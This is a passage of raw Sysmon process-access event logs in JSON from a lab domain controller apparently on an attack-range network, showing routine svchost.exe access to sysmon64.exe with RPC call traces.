ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:48.000","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1893,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:48.000\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:48.000","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1894,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:48.016\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:48.016","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1895,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:48.016\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:48.016","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1896,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:48.016\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:48.016","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1897,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:48.016\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:48.016","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1898,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:48.016\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:48.016","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1899,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:48.016\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:48.016","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1900,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:48.016\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 